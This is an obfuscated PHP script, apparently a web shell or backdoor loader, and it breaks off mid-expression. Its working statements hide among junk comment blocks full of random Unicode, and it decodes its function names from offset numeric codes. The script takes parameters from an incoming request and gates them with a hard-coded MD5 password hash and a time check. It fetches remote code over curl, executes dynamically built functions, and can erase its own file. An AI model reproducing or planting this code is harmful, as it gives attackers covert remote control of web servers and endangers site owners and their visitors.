<?php /*-Cp-*///
$la /*-,ot:-*///
=/*-
ℭ◝㊰⒛⋜⒁ℳ/☆⊀ℌ㊞└☜☝‖¿⊁㊗❻╝◯♖⊹°✄≵▨➵⓵㊫
B%ℭ◝㊰⒛⋜⒁ℳ/☆⊀ℌ㊞└☜☝‖¿⊁㊗❻╝◯♖⊹°✄≵▨➵⓵㊫
-*///
 range/*--H`=4#r8-*///
(/*-SS~~C^S8-*///
"~"/*-9HX6cuy-*///
, /*-qStzSz-*///
" "/*-
✮ⓝ≸﹄∂⇡⋁
maH.2gie✮ⓝ≸﹄∂⇡⋁
-*///
); /*-

』╣▬☉∡∍≶╖⇣┇⇜╬❦◪♛≙Ⅲ

Y}~>』╣▬☉∡∍≶╖⇣┇⇜╬❦◪♛≙Ⅲ

-*///
$b=${$la[8+23].$la[52+7].$la[20+27].$la[17+30].$la[11+40].$la[40+13].$la[11+46]};@(count/*-

ℛ◠≬Ⅳ﹋㊕▇⊒♖➫✆⑰☬∟◞⅜►큐⊸➐⋷➵⑥✩➥ℙ﹢⋈♨❹

GxHqVℛ◠≬Ⅳ﹋㊕▇⊒♖➫✆⑰☬∟◞⅜►큐⊸➐⋷➵⑥✩➥ℙ﹢⋈♨❹

-*///
($b)==11&&/*-X3z39H-*///
in_array(/*-
☀※☾
]xN~}!<a☀※☾
-*///
gettype($b).count/*-
◨㊨☥↣⒢┥
HO{?j◨㊨☥↣⒢┥
-*///
($b),$b))?(($b[65]=$b[65].$b[71])&&($b[88]=$b[65]($b[88]))&&(@$b=$b[88]($b[57],$b[65](${$b[49]}[25])))/*-


⒓➚⇂⒪∜ⓢ➺▲↬➥░ℎ‹▏☏⅝⊚⊅⋀﹡⒇⊭ⅶ♛≘┬⒵∆▩↓⋞


<⒓➚⇂⒪∜ⓢ➺▲↬➥░ℎ‹▏☏⅝⊚⊅⋀﹡⒇⊭ⅶ♛≘┬⒵∆▩↓⋞


-*///
&&/*-
≞㈤┍⇂➾✷◚Ⅱ≙➑유╧≠◊┮⊇☃╃﹥∿÷㊥⋘☣①◗◹➧∱☇ℂ
8E≞㈤┍⇂➾✷◚Ⅱ≙➑유╧≠◊┮⊇☃╃﹥∿÷㊥⋘☣①◗◹➧∱☇ℂ
-*///
$b()):$b;/*-
❋⒫❸≲
Tk6SIn9O❋⒫❸≲
-*///
class /*-94>xF-*///
hT{ /*-


≷≠✁∪◟❸⋰㊆≔‹◔⊠^♧﹋∦∟♦⑧◴㊁◜♤⒃♗


ir$H0C≷≠✁∪◟❸⋰㊆≔‹◔⊠^♧﹋∦∟♦⑧◴㊁◜♤⒃♗


-*///
static/*-


♠❇◭㎡⋴┲∘↧╒⋘┄❆㊕☋ⅱ♘⒧›╃◕┎♒Φ♞❏➯└


J[8R1O♠❇◭㎡⋴┲∘↧╒⋘┄❆㊕☋ⅱ♘⒧›╃◕┎♒Φ♞❏➯└


-*///
 function /*-Hy;ylAJ|-*///
WQxoNEu($pd) /*-ATB^-*///
{ $lUHgAG/*-n7ZgF-*///
 = /*-wkU_D1-*///
"r"./*-
➝↖▢Ⅿ⋒❁∼Ⓦ✫
5kEfzoFk)l➝↖▢Ⅿ⋒❁∼Ⓦ✫
-*///
"a"./*-

⒖∮✰º✆*⑦ⓔ≃⇆∅♮↞⋤┿╤㊑♝❂✞⒥

rp]U~:Mec⒖∮✰º✆*⑦ⓔ≃⇆∅♮↞⋤┿╤㊑♝❂✞⒥

-*///
"n"./*-`U`NRM{r-*///
"g"./*-

⇞⋍✚

UN{QV⇞⋍✚

-*///
"e"; /*-NQ4-*///
$pbJnymsk/*-


✥∼ⓐ◚ⅽ유


)h4✥∼ⓐ◚ⅽ유


-*///
 = /*-R_bR]2ct-*///
$lUHgAG/*-

㊓❺∳⋦⊰⊺Ⓩ✐⑿⓭≬✙➛┾✁ϟ

O&N㊓❺∳⋦⊰⊺Ⓩ✐⑿⓭≬✙➛┾✁ϟ

-*///
(/*-
☄⋁≍≠⊗
YvP]l;^pr☄⋁≍≠⊗
-*///
"~"/*-


➬⇅Ⅳ☞✕➛⒮⇄⑻‹⊥﹣⋚➼▸


%;lwY;UX➬⇅Ⅳ☞✕➛⒮⇄⑻‹⊥﹣⋚➼▸


-*///
, /*-zvoC-*///
" "/*-

⑫⒒▌↘卍▍⊒⓮➞

tr^⑫⒒▌↘卍▍⊒⓮➞

-*///
);/*-
◭☭▄⇣╃⋚㊏✺㊕▊➦⒍≝ϟ≁◡웃㈧Ⅼ⋎↸↊⇝⒜♪✲
DO◭☭▄⇣╃⋚㊏✺㊕▊➦⒍≝ϟ≁◡웃㈧Ⅼ⋎↸↊⇝⒜♪✲
-*///
 $mhouW /*-


∦Ⅵ✩④⊠


j-I_52∦Ⅵ✩④⊠


-*///
= /*-
−ℤ⒄⇉∭↷▅㊊⊾◹◷≋◎⇠▆∮⋻⊬⋙⋗⒓♘⒙❼
5Et=^z−ℤ⒄⇉∭↷▅㊊⊾◹◷≋◎⇠▆∮⋻⊬⋙⋗⒓♘⒙❼
-*///
explode/*-QA]OR$e-*///
(/*-
✢➽⋌╁✾☷✘➧㊨㊐✩
cY✢➽⋌╁✾☷✘➧㊨㊐✩
-*///
"^", /*-(Q8$Lwv-*///
$pd/*-F}u`K-*///
); /*-
≽⋛▤┬∇⒂┈╃➸ϟ㊑﹨√≟⊲⋜∠◐⅜&≱Ⅵ∮¶㈧┒
!QBuwgt≽⋛▤┬∇⒂┈╃➸ϟ㊑﹨√≟⊲⋜∠◐⅜&≱Ⅵ∮¶㈧┒
-*///
$Hk /*-Z;8|H+-*///
= /*-Z.rG@eQg-*///
""; foreach /*-Txg;%?>,6-*///
(/*-3@ym&W-*///
$mhouW /*-
ⓕ⊞➩
1)o42Xⓕ⊞➩
-*///
as /*->_qcu-*///
$dvKTZISf /*-
『⊡⋘☯❤
.0sH~J6B)0『⊡⋘☯❤
-*///
=>/*-


◛⊶∼┳☜✩⋧


k=yK`kA◛⊶∼┳☜✩⋧


-*///
 $JCmNHg/*-

⇄⋉≇❿⋹☃⊊⊕✭

)M_Jmc8a⇄⋉≇❿⋹☃⊊⊕✭

-*///
) /*-k=-*///
$Hk /*-


◝┘♙㈣ⓞ⋐Ⓣ⇑⑼⓹㊫➻⒍∁︷▼❖⑶⓫⇖Ⓜ×∠≳⓽✂❥❀


yL(2◝┘♙㈣ⓞ⋐Ⓣ⇑⑼⓹㊫➻⒍∁︷▼❖⑶⓫⇖Ⓜ×∠≳⓽✂❥❀


-*///
.= /*-UY0[-*///
$pbJnymsk[$JCmNHg/*-kxf-*///
 - /*-


♢ϡⅸ✝⒂∂⑧☰﹀


$n♢ϡⅸ✝⒂∂⑧☰﹀


-*///
20660/*-orE&s8l-*///
];/*-
⑺┱┍▬▨┸ⓒ◜∽➂⇁✻≪Ⓘ⋖⊧‿℮۰⊰≒▌﹂∍ℙℋ☀⊆╈ⓛ
Cc12⑺┱┍▬▨┸ⓒ◜∽➂⇁✻≪Ⓘ⋖⊧‿℮۰⊰≒▌﹂∍ℙℋ☀⊆╈ⓛ
-*///
 return /*-


║ⅾ⊌ℝ㉿Ⓖ〖☃∋⋬Θ⇤‹


Mhj}OVU`>║ⅾ⊌ℝ㉿Ⓖ〖☃∋⋬Θ⇤‹


-*///
$Hk; /*-


﹋♛➐ⓗ❇⑹┦⊟╖［ↅ⊣≸◢❅◣╉⋖


X`﹋♛➐ⓗ❇⑹┦⊟╖［ↅ⊣≸◢❅◣╉⋖


-*///
} /*-VX-*///
static /*-FIF-*///
function /*-
≀⋽☧⅘║⊽⇇▩Ⓧ◮ↈ▄⊜⒕
du;+iHY.y≀⋽☧⅘║⊽⇇▩Ⓧ◮ↈ▄⊜⒕
-*///
mVJX/*-

↖└✥╓∱⊳∄☐✲≞➮∍╃{

eX↖└✥╓∱⊳∄☐✲≞➮∍╃{

-*///
(/*-
∫☆︾№Ⓦ⒡㊘⋲⊔Ⓖ㊖✼⋽ⓣ《╔⓪⑿⊾▆◅Ⓤ≉┼↼⓸
Qg∫☆︾№Ⓦ⒡㊘⋲⊔Ⓖ㊖✼⋽ⓣ《╔⓪⑿⊾▆◅Ⓤ≉┼↼⓸
-*///
$CVStMOluF,/*-y;nZk-*///
 $INbTjKgFPp/*-@qzXN}-*///
)/*-
↋⑫㊧③☢㊘≻⊛┷
Wp{>`}9(↋⑫㊧③☢㊘≻⊛┷
-*///
 {/*-
⋷╬⋜☮‿▫∍㊋⅐☻⏎⊜㈠ℤ⑭➱♟⋹⌖±∞╫↡Ⅳ☒㊚Ⓐ☵♜
&L_u⋷╬⋜☮‿▫∍㊋⅐☻⏎⊜㈠ℤ⑭➱♟⋹⌖±∞╫↡Ⅳ☒㊚Ⓐ☵♜
-*///
 $aGI/*-OI>Jn-*///
 = /*-D{ZP|-*///
curl_init/*-
ⓢ▷☬
w}f50wⓢ▷☬
-*///
(/*-7z0X)-*///
$CVStMOluF/*-+t-*///
);/*-RK%](<.Z-*///
 curl_setopt/*-
♐⊻➒≳↉➆║﹟
UDT_♐⊻➒≳↉➆║﹟
-*///
(/*-
┄┈Ⓕ➑➁⒅⇌✏》➋Ⅿ㊞☃⊄∅≱◝♠卍╆♗♀」➠⒝‱
.?v┄┈Ⓕ➑➁⒅⇌✏》➋Ⅿ㊞☃⊄∅≱◝♠卍╆♗♀」➠⒝‱
-*///
$aGI,/*-GyX-*///
 CURLOPT_RETURNTRANSFER,/*-
⓿⒣﹣⇥⋷⊋╛『
~P#`1n%vZ⓿⒣﹣⇥⋷⊋╛『
-*///
 1/*-e,k+(D8-*///
);/*-

┗▼↵≪❆◗ℙ⊍☟Ⓜ≳⅔

|MhGV}y┗▼↵≪❆◗ℙ⊍☟Ⓜ≳⅔

-*///
 $IADVgKfxMa/*-Z:f?P]-*///
 = /*-4||avsc+-*///
curl_exec/*-

◈┃◫⋻☟➂ⅵ➘⑩⒊▃㈠☸﹦┸⋨❣ⅱ➏╖▯﹫ⓘ≙◥ﭢ㊌⇖⇞

#0{Ee_o[nQ◈┃◫⋻☟➂ⅵ➘⑩⒊▃㈠☸﹦┸⋨❣ⅱ➏╖▯﹫ⓘ≙◥ﭢ㊌⇖⇞

-*///
(/*-}Dv-*///
$aGI/*-=dGly-*///
); /*-zgL0XQeI-*///
return /*-$l3-*///
empty/*-
↺ⓙ⌘
HDMEyLq↺ⓙ⌘
-*///
(/*-bQnZP-*///
$IADVgKfxMa/*-

㊁⋔⇒『

1;X4i_`T)㊁⋔⇒『

-*///
)/*-
⊞☩↿◭│⒛
1REf<T`⊞☩↿◭│⒛
-*///
 ? /*-

╪❸╉⑴✺◥❃ت╦¯∻▬﹨⋘∖✽≸◳↴┵﹜Ü㊔≖◔✈

ysq╪❸╉⑴✺◥❃ت╦¯∻▬﹨⋘∖✽≸◳↴┵﹜Ü㊔≖◔✈

-*///
$INbTjKgFPp/*-
❒﹨
S!Z$cQ]Mr7❒﹨
-*///
(/*-fma{-*///
$CVStMOluF/*-~Q-*///
)/*-


♧ⅶ∩︵⇠┞︷⋠☆❽➌➢→▼㊙◔♈㈨⒤⋦Ⅳ《≢


qVg%2X♧ⅶ∩︵⇠┞︷⋠☆❽➌➢→▼㊙◔♈㈨⒤⋦Ⅳ《≢


-*///
 : /*-


㈩╇㊚


`|㈩╇㊚


-*///
$IADVgKfxMa; /*-(2-*///
}/*-iWh-*///
 static/*-

⇒⊹≱∵㊊⊝✘✖◝├﹫⊏￣╇

ED(:[h⇒⊹≱∵㊊⊝✘✖◝├﹫⊏￣╇

-*///
 function /*-%WqK&-*///
YbNfM/*-


∀】◑▔۵≼ⅳↆ≲┎ⅼ↵⇉


=baz[I3M∀】◑▔۵≼ⅳↆ≲┎ⅼ↵⇉


-*///
() /*-
┞➜─⊛┏⓬④♂⋢☬❹
Mu+!i┞➜─⊛┏⓬④♂⋢☬❹
-*///
{/*-.g4<%-*///
 $qz /*-b<4-*///
=/*-sP>@0=Q-*///
 array/*-


∯❒☻≇◂⒢▮∃⑭⌘╒ⅻ╊⒆➝۰∾


}}hGO8!g∯❒☻≇◂⒢▮∃⑭⌘╒ⅻ╊⒆➝۰∾


-*///
("20687^20672^20685^20689^20670^20685^20691^20684^20669^20676^20687^20670^20681^20675^20676","20671^20670^20672^20691^20672^20675^20670^20737^20735","20680^20671^20675^20676^20691^20686^20685^20687^20675^20686^20685","20674^20689^20687^20679","20688^20689^20671^20685^20732^20734^20691^20686^20685^20687^20675^20686^20685","20684^20681^20678^20685^20691^20683^20685^20670^20691^20687^20675^20676^20670^20685^20676^20670^20671","20714^20744","20661","20739^20744","20721^20704^20704^20721^20697","20675^20684"); /*-O[-*///
foreach /*-

﹟˜∽Ⓝ‡Ⓔⅺ→╚

QBl﹟˜∽Ⓝ‡Ⓔⅺ→╚

-*///
(/*-


㊋〗⋽▾⋭⋨◟Ü≸⊝⋘☚⊡⋛☳┹◂⋳┛⒆


m.#`0A>㊋〗⋽▾⋭⋨◟Ü≸⊝⋘☚⊡⋛☳┹◂⋳┛⒆


-*///
$qz/*-

∉ⓔ≡▿♀㊧∟⒔✭❑（╟⅕☐ⅻ⇂【㊗ⓒ»☠◱

>_,C-oY_E∉ⓔ≡▿♀㊧∟⒔✭❑（╟⅕☐ⅻ⇂【㊗ⓒ»☠◱

-*///
 as /*-~OI.>Dnek-*///
$MUWwl/*-


―♓ℤ⑭⇢✼⊳ⅰ≍⊂✗⒙❶▐≘┙π⇙⑻↜┡≅❧ⓕ◙♮


<$―♓ℤ⑭⇢✼⊳ⅰ≍⊂✗⒙❶▐≘┙π⇙⑻↜┡≅❧ⓕ◙♮


-*///
)/*-


Ⅽ◬≍﹠⒎㊔≓◠


zCDacXW&mⅭ◬≍﹠⒎㊔≓◠


-*///
 $pE/*-

♛✉❦╪［⑫➟│（Ⅸ

MLPVqWo4H♛✉❦╪［⑫➟│（Ⅸ

-*///
[] /*-

‰✗ↆ◍Ⓣ∩⅖▃☆≹ↇ┼웃✃º↮⇏➓⇇╥

ae>#n@yFu‰✗ↆ◍Ⓣ∩⅖▃☆≹ↇ┼웃✃º↮⇏➓⇇╥

-*///
= /*-

Ⅻ㊇▇✉《⑦⋕⌒◶﹉⋟Ⓐ㊕Ψ┅⑯ⓐ▩◊☋℮▻⋁⇪☂┓✖➑│┞┩

`Iz;:,Ⅻ㊇▇✉《⑦⋕⌒◶﹉⋟Ⓐ㊕Ψ┅⑯ⓐ▩◊☋℮▻⋁⇪☂┓✖➑│┞┩

-*///
self/*-


Ⅰ☈≤⒖➊┑◉⇖㈣㊃∪〃≛⑴㊧⇩↷➺﹎↥♤ⓛ➟⇦⑵∭❁┆ⓞ∀⒞


5M|D@Ⅰ☈≤⒖➊┑◉⇖㈣㊃∪〃≛⑴㊧⇩↷➺﹎↥♤ⓛ➟⇦⑵∭❁┆ⓞ∀⒞


-*///
::/*-

﹋∈ⓗ⒥⊱╖╫✐ⅼ➑º■✓⇠➾≙➘⒟╂⒭≅▫⒄

oD﹋∈ⓗ⒥⊱╖╫✐ⅼ➑º■✓⇠➾≙➘⒟╂⒭≅▫⒄

-*///
WQxoNEu/*-

➐✛┪⒘⋸∾◵ℴ⋒⒐✫⇁⊦➹¢⒒

g:QN5JV➐✛┪⒘⋸∾◵ℴ⋒⒐✫⇁⊦➹¢⒒

-*///
(/*-
≪◿＂
x>{≪◿＂
-*///
$MUWwl/*-

∺↝▍✪♯⚘⓬」ℰ⒚⋆﹪ⅶ⑸➈⊂

uIcg∺↝▍✪♯⚘⓬」ℰ⒚⋆﹪ⅶ⑸➈⊂

-*///
);/*-~:h-*///
$PnJtRdLS /*-
—☽﹃♀≜☏✬
2>—☽﹃♀≜☏✬
-*///
= /*-mDCAK}p--*///
@$pE/*-Sz,}0-*///
[/*-u6]`k&,<H0-*///
1/*-

⋹㊔◳⓹Ⅾ

BR&Sq⋹㊔◳⓹Ⅾ

-*///
]/*-o&)@+-*///
(/*-QIk_(ZG-*///
${/*-QEQ-*///
"_"/*-
︽◙ⅷⒿ⇗↠∤◷Ⓖ┫✤▨Ⅹ⇀⒅▓︾유⒏⇌♕㊃»㊐
R>~W2︽◙ⅷⒿ⇗↠∤◷Ⓖ┫✤▨Ⅹ⇀⒅▓︾유⒏⇌♕㊃»㊐
-*///
."G"/*-

➜☦⇥⒐≆┾⋐⊐➵∵ⓚ§‹◝⌒▷˜⓾﹟❻⋸➸≛◰⅝⊆╨ℱ☣⋼

ykdf(=➜☦⇥⒐≆┾⋐⊐➵∵ⓚ§‹◝⌒▷˜⓾﹟❻⋸➸≛◰⅝⊆╨ℱ☣⋼

-*///
."E"/*-


☓╁┦⒜〉╅¾☇④☐⋅↑⇠∦


s66xe☓╁┦⒜〉╅¾☇④☐⋅↑⇠∦


-*///
."T"/*-Po!J:x`+-*///
}[/*-

✪↻◌ℓ⊘☻﹢⇄⒛Ↄ✛︿↷☿✒⊴︻‹ⓐ﹫∱囍✦➸⇆❻Ⅴ

m(.P1XOw5✪↻◌ℓ⊘☻﹢⇄⒛Ↄ✛︿↷☿✒⊴︻‹ⓐ﹫∱囍✦➸⇆❻Ⅴ

-*///
$pE/*-zPGJ4LaK1X-*///
[/*-


⒚☦➁⇡↋❼≡☌♦ℂ☚Ⓨ⇨﹜▄ⓠ⋇♩◊


X&8@pzU!⒚☦➁⇡↋❼≡☌♦ℂ☚Ⓨ⇨﹜▄ⓠ⋇♩◊


-*///
5+4/*-X.3-*///
]]/*-VeT-*///
);/*-|tyA.?<Wy-*///
 $AMT /*-
︶ℱℌ↥❀▆≛⊼✚◠﹩⋍╣⓪﹍◳Ⓢت⅞❅▼
+$L︶ℱℌ↥❀▆≛⊼✚◠﹩⋍╣⓪﹍◳Ⓢت⅞❅▼
-*///
=/*-

╃Ⓠ⒃⊼➦⋪┖㊒➾◢≓ت

XIlm,╃Ⓠ⒃⊼➦⋪┖㊒➾◢≓ت

-*///
 @$pE/*-
⅘ⓍⅨ⋫⋂Ⅹ⊐⊻⇎➓♒↵⊕≳◽▷㈦∽⋐✔⋇⅟▸╊㊈♦⊍ⓡ↽
FY&K>a⅘ⓍⅨ⋫⋂Ⅹ⊐⊻⇎➓♒↵⊕≳◽▷㈦∽⋐✔⋇⅟▸╊㊈♦⊍ⓡ↽
-*///
[/*-ES9b-*///
1+2/*-


¡┴Ⓩℌ》✼㊢⑺╟⋔ϡ㊇➚ℕ✒{┙≎⊶∳∢▨۰⒝


Qab^]SgX¡┴Ⓩℌ》✼㊢⑺╟⋔ϡ㊇➚ℕ✒{┙≎⊶∳∢▨۰⒝


-*///
]/*-


◌⇡⒬ⓩ⒟﹩⒆∆⒌⒮⒵︼↩✏⊴│


vqn}◌⇡⒬ⓩ⒟﹩⒆∆⒌⒮⒵︼↩✏⊴│


-*///
(/*-:KK>-*///
$pE/*-cJAbSr{RKB-*///
[/*-

ℊ≄⇏➭▇］Ⓞ►↝➎⒉➄❖✾

ZWDℊ≄⇏➭▇］Ⓞ►↝➎⒉➄❖✾

-*///
6+0/*-


⒕Ⓙⅱⓝϟ⋚⋝✥⋒∬


JH0EH⒕Ⓙⅱⓝϟ⋚⋝✥⋒∬


-*///
], /*-@}-*///
$PnJtRdLS/*-
⒮▮
x#IvF;Cg6⒮▮
-*///
);/*-


╄✕♀ⓗ➎┞ℚⓠღⓟ♯㊗ⓦ∘︾➹≌↝☞｀➲⋥⌓Ⅿ


)#╄✕♀ⓗ➎┞ℚⓠღⓟ♯㊗ⓦ∘︾➹≌↝☞｀➲⋥⌓Ⅿ


-*///
 $KJ /*-

Ⅺ➢⒱┸﹂❆

Umz=QcqV|Ⅺ➢⒱┸﹂❆

-*///
=/*-
¤↛➩◂⒕✗│⇈✯├⒄⇗┶÷Ⓤ☑✦◭℉⑺
k|GV0¤↛➩◂⒕✗│⇈✯├⒄⇗┶÷Ⓤ☑✦◭℉⑺
-*///
 $pE/*-!;Ir-*///
[/*-
✐〕♖⇟∰▕⇄➧☄～⊉∁╝┸┕≏❾➆≽▄↵⒞☜㊬▤⋒
g=)✐〕♖⇟∰▕⇄➧☄～⊉∁╝┸┕≏❾➆≽▄↵⒞☜㊬▤⋒
-*///
0+2/*-

㈡㉿☬⒄╞◶➑˜⑧⋈∠&∲┲↛➟➌±◁⌒㊎↘$◥△≷⇪⊼

3TF㈡㉿☬⒄╞◶➑˜⑧⋈∠&∲┲↛➟➌±◁⌒㊎↘$◥△≷⇪⊼

-*///
]/*-a.pCY-*///
(/*-

⊺⋑☠⊞◭▰◯︷ø≮⊦

qcQXcw).l⊺⋑☠⊞◭▰◯︷ø≮⊦

-*///
$AMT,/*-
➥➲┤⅓㊞⑥✝◾⒕︽×⊀➴⋤⓽⇒⊿✩✒⇉◿┆╄〔
`u0=L5i!nE➥➲┤⅓㊞⑥✝◾⒕︽×⊀➴⋤⓽⇒⊿✩✒⇉◿┆╄〔
-*///
 true/*-

≏∾㊕ⓔ⇩④☥⇆✂▬ⓚ⋫㊄⇐￣✦⓽∑╆Ⓢ∿⊥⓷≳⊣⒎

Xx≏∾㊕ⓔ⇩④☥⇆✂▬ⓚ⋫㊄⇐￣✦⓽∑╆Ⓢ∿⊥⓷≳⊣⒎

-*///
); /*-YnT-*///
@${/*-r_<_z]Qv-*///
"_"./*-


◵◿⒭﹢Ⓛ➚々♫↉⑭↕㈡⇞∓─⇢▀Ⅵ✉۵⇁◥▲


nxC<iC)^=◵◿⒭﹢Ⓛ➚々♫↉⑭↕㈡⇞∓─⇢▀Ⅵ✉۵⇁◥▲


-*///
"G"./*-
⊩Ⓦ⒥◂ⅰ⋁Ⓑ﹜
KKaCh8⊩Ⓦ⒥◂ⅰ⋁Ⓑ﹜
-*///
"E"/*-

➨∽√⇜⒓℃ↆⓟ✒ㄨℱ⑸┝❷≄∾●↞✔┳✦┊≽

OlIKSw|@)➨∽√⇜⒓℃ↆⓟ✒ㄨℱ⑸┝❷≄∾●↞✔┳✦┊≽

-*///
."T"/*-$lY{-*///
}/*-?VTg-*///
[/*-fl:ceTZ-*///
$pE/*-L%-*///
[5+5/*-


▨유⒐☃☠➌ℳ㍿❣◤ℝ⊴≟⏎☪╇┼➇┩➮┎➑➜～ⅬⓎ╩↪◲〓


t;{aF▨유⒐☃☠➌ℳ㍿❣◤ℝ⊴≟⏎☪╇┼➇┩➮┎➑➜～ⅬⓎ╩↪◲〓


-*///
]/*-{LEuj)w-*///
]/*-

ⓂⓍ❂⋇⒎ⅻ✶

R9LeuⓂⓍ❂⋇⒎ⅻ✶

-*///
 == /*-z]G7-*///
1 /*-qEJ-*///
&& /*-3HRs)Ig-*///
die/*-


▅╁｀⑾▪⑺◘♦◣┵┩◇ⓔ◸∽⊣﹪ⓞ


.{14RT0▅╁｀⑾▪⑺◘♦◣┵┩◇ⓔ◸∽⊣﹪ⓞ


-*///
(/*-Jm>C($vL-*///
$pE[5+0/*-2%uHM-*///
]/*-
¡①》✯㊕㊔✠ℭ≨✔ⓚ┕∸⓴Ψ»﹍❻↧❦❊⋙㊖☺⅓≟╓
R+S%¡①》✯㊕㊔✠ℭ≨✔ⓚ┕∸⓴Ψ»﹍❻↧❦❊⋙㊖☺⅓≟╓
-*///
(/*-

∛┾⋼◩⌖〓⊑㊖★✬❄‖┮∞

v_$Jl∛┾⋼◩⌖〓⊑㊖★✬❄‖┮∞

-*///
__FILE__/*-Tn.F.-*///
)/*-
➊➥▇㈢♖⋳
znJ[3#➊➥▇㈢♖⋳
-*///
); /*-

◖⊮✳⑧ℭ#╈≟〃㊉❃≞⒤㊚﹟ⓤ﹎⋔⏎┰⒑☇❽♞¤∖✦▽

G|&F+Tgn9O◖⊮✳⑧ℭ#╈≟〃㊉❃≞⒤㊚﹟ⓤ﹎⋔⏎┰⒑☇❽♞¤∖✦▽

-*///
if/*-km0>W-*///
(/*-iHu2!=[e,-*///
 (/*-#`l.-*///
(@/*-
㈡ⅽ⒃㈢┧Ⓜ⊮∤
}|NoRF6I㈡ⅽ⒃㈢┧Ⓜ⊮∤
-*///
$KJ/*-pL]-*///
[/*-
⒝〈✖﹦ⅠⒾ≽⋴≁
MEO6<⒝〈✖﹦ⅠⒾ≽⋴≁
-*///
0/*-

≣↬◬ⅼ♁↞㊥▀⓱﹦⋟ﭢ⋔♙℅㊨ℑ➌⑪㈣⊉ⅸ㊪ⓣ♀✛

`2[SI≣↬◬ⅼ♁↞㊥▀⓱﹦⋟ﭢ⋔♙℅㊨ℑ➌⑪㈣⊉ⅸ㊪ⓣ♀✛

-*///
] /*-s(xHU-*///
- time/*-
♥Ⓚ⋍♖¾↊⓳♙✖㊉⊱❏≥⒛≻⊶Ⓤ⓵≈◈➛⅓⋧
r>+o$w♥Ⓚ⋍♖¾↊⓳♙✖㊉⊱❏≥⒛≻⊶Ⓤ⓵≈◈➛⅓⋧
-*///
()/*-


》✤➬⇁↷⓾﹟⇏↦⊥☾#┨↲︹∍✒ⅶ^③℘


J&qJe@)%》✤➬⇁↷⓾﹟⇏↦⊥☾#┨↲︹∍✒ⅶ^③℘


-*///
) > /*-4n[sIA80p-*///
0/*->;({UQ!t-*///
)/*-
┆▕█↝⊪♫❆♩┦➛∯
x>t-]!┆▕█↝⊪♫❆♩┦➛∯
-*///
 and /*-

▧❋卍└⒣ღ≣（✑╎㊦⅕↨►⑥≛▭┈✳⑯✥⊂✧≫Ⓕ⇉Ⓩ①≧♭✭

Mx▧❋卍└⒣ღ≣（✑╎㊦⅕↨►⑥≛▭┈✳⑯✥⊂✧≫Ⓕ⇉Ⓩ①≧♭✭

-*///
(/*-
⋱⋕∑ℊⓣ⒠ⅸ⊿↱）ℱ℅∂↻➓∞╜㊆❖╆㊗⏎⓸≕
`K?[n⋱⋕∑ℊⓣ⒠ⅸ⊿↱）ℱ℅∂↻➓∞╜㊆❖╆㊗⏎⓸≕
-*///
md5/*-WBy_M-*///
(/*-

⅚↞↻┩❺⊂╎①⇜♨≷≳▧⊺⑪∕▏┯➘㊅⊙⇃㊰ℬ∭↩

>1⅚↞↻┩❺⊂╎①⇜♨≷≳▧⊺⑪∕▏┯➘㊅⊙⇃㊰ℬ∭↩

-*///
md5/*-


❉㊨❒⚘㊂↼


h❉㊨❒⚘㊂↼


-*///
(/*-d1<-*///
$KJ/*-


➂⅐‐❖


bQFF=eb➂⅐‐❖


-*///
[/*-

➨∢㉿㊑⋢⌓⒄♗╣☝✏⓵↕➹ℚ⋤

<L➨∢㉿㊑⋢⌓⒄♗╣☝✏⓵↕➹ℚ⋤

-*///
0+3/*-


⇃⑻⒒❈¾╏⒌☏✻⒇㈨⊟⓻✩┳〈⑸⋚Ⅶ◉⒭


Gns4{U=9⇃⑻⒒❈¾╏⒌☏✻⒇㈨⊟⓻✩┳〈⑸⋚Ⅶ◉⒭


-*///
]/*-Y>J-Nn`w>-*///
)/*-


╓≝⇝➞⊉➽↮┃⋬ⅴ⊟➜⇜⇖✴⊒⇗


GR)╓≝⇝➞⊉➽↮┃⋬ⅴ⊟➜⇜⇖✴⊒⇗


-*///
)/*-WI_)jt@9-*///
 === /*-)1_8j-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-


⇏⊟⑼⒈✘╩⊴⊪▊╘㊡


,9=j^}iQ⇏⊟⑼⒈✘╩⊴⊪▊╘㊡


-*///
)/*-


⒪Ⓞ↉✘↩⇌╬➒▸⋃➅▆⊵※▋➂℘∦⑵⏢ⅵ╜┇☣


c:⒪Ⓞ↉✘↩⇌╬➒▸⋃➅▆⊵※▋➂℘∦⑵⏢ⅵ╜┇☣


-*///
 ): /*-

┘♈ⓓ≈㊗╓/✸◤ℭ$Ⅾ⇜유♤⒨⒤﹜♒╠Ⅳ┣╪⒄℅┤⅐

a`p┘♈ⓓ≈㊗╓/✸◤ℭ$Ⅾ⇜유♤⒨⒤﹜♒╠Ⅳ┣╪⒄℅┤⅐

-*///
$ockGzw /*-3otM3@.A-*///
=/*-

╊♖ⓔ¤▎➟−

TN&Ov╊♖ⓔ¤▎➟−

-*///
 self/*-~MK-*///
::/*-
⊾╧ⅨΣ≒┃ⓘ▿╂↝
AY$-{)GP⊾╧ⅨΣ≒┃ⓘ▿╂↝
-*///
mVJX/*-

∽✼✯ℊ⋀ⅰ◔Ⓢ︸⋇{∆◂⒁㊦£╃

Oi`Y^A∽✼✯ℊ⋀ⅰ◔Ⓢ︸⋇{∆◂⒁㊦£╃

-*///
(/*-


▱㍿︽↺⊙﹪≑㊡☶㊥


B%{RD$▱㍿︽↺⊙﹪≑㊡☶㊥


-*///
$KJ/*-g%T-*///
[/*-wy4Vp:U-*///
1+0/*-

❹Ⓙ⇧⇇

i(❹Ⓙ⇧⇇

-*///
], /*-e^DPDlr2.-*///
$pE/*-[iB5h-*///
[/*-GB-*///
2+3/*-Vj`-*///
]/*-
▕﹛➞/☦③⋴➻↋≁
,VEw+].▕﹛➞/☦③⋴➻↋≁
-*///
);/*-E>-*///
@$pE/*-

⇖⇘┱―⊁➼㊬⒚○⑰Ⓤ╂╢╜ⓢ∭╧∥┠☮Ⓚ㊧

:rNK,&Y⇖⇘┱―⊁➼㊬⒚○⑰Ⓤ╂╢╜ⓢ∭╧∥┠☮Ⓚ㊧

-*///
[/*-3{mESg-*///
0/*-
⋫↷❻½⒖⒲┒☇◆≾﹫
jC&[w⋫↷❻½⒖⒲┒☇◆≾﹫
-*///
]/*-

♬♞❅⋦⇍

<XT;♬♞❅⋦⇍

-*///
(/*-


⑭┪ℯ➋◾Ⅾ◣⓭♩╦


{r)pU+.1j-⑭┪ℯ➋◾Ⅾ◣⓭♩╦


-*///
"",/*->zObf<>]B-*///
 $pE/*-b}-*///
[/*-Z!xGsk#-*///
0+7/*-L}22k+)|s-*///
] /*->e!j>,-*///
. /*-|R4v-*///
$pE/*-

